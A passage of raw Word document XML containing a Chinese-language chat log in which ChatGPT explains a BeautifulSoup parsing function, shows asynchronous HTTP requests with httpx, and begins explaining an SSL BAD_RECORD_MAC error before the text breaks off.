          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A729AC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32F6584B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，它定义了一个函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bs4html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个函数接受一个参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bs4_html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，预期是一个包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6008D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E6FE9C2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来，它创建了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> BeautifulSoup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> soup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个对象将负责解析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'html.parser' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7667645B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7781EFB1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，它尝试创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，这个对象的名称取自解析过的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的标题（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;title&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签的内容）。这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该是一个之前定义过的类，不过在这段代码中并没有给出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED54439" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A72056" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;title&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;title&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标签的内容为空，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> soup.title.text </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AttributeError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常，因此这段代码使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句进行错误处理。在这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句中并没有看到相应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> except</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可能是在这段代码之后。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34907715" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2535336D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码的意思可能是，根据解析得到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标题，创建一个名为该标题的数据表。但没有给出完整的代码，我们无法确定这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类的具体用途和实现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502AB6D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52772B5F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写法吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C7ACE2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47403DFB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0696A4E6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">requests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库是同步的，它不提供异步方法。如果你需要在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中使用异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>你可能会想要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> aiohttp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样的库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40AF72" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3897827B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的示例，它的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库非常相似：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277568E6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E460C94" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405D7F7A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF052DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A80FE6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3576D10F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def fetch_data(url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3EF282" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    async with httpx.AsyncClient() as client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA38B2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res = await client.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738DEBD6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        return res.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D7584" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B21DB3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292A2037" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    url = 'http://example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50229CB2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = await fetch_data(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE24AC7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BA6A2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751475BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF581D1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61820491" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个示例中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">fetch_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个异步函数，它使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx.AsyncClient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> get </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法来发送异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求。使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是为了确保在执行完请求后，客户端会被正确关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F6201E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243AF8E4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你需要注意的是，你必须在异步环境中调用异步函数，例如在另一个异步函数中或者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio.run()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。否则，你的代码可能无法正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056AFC14" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455360C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssl.SSLError: [SSL: SSLV3_ALERT_BAD_RECORD_MAC] sslv3 alert bad record mac (_ssl.c:2508)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04075FB3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF1AE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E74D88" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"SSLError: [SSL: SSLV3_ALERT_BAD_RECORD_MAC]"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误，表示在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手或数据传输过程中，接收端在解密收到的数据时发生了问题。具体来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"BAD_RECORD_MAC"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的错误表示接收到的记录的消息认证码（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）与预期的不一致，可能原因有：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489636CB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C0E229" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据在传输过程中被篡改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B125A0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器和客户端支持的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议版本或加密套件不兼容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD1FBA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络连接不稳定，导致数据丢失或出错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B6E9AD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2F7A25" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，这个错误通常是由底层的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
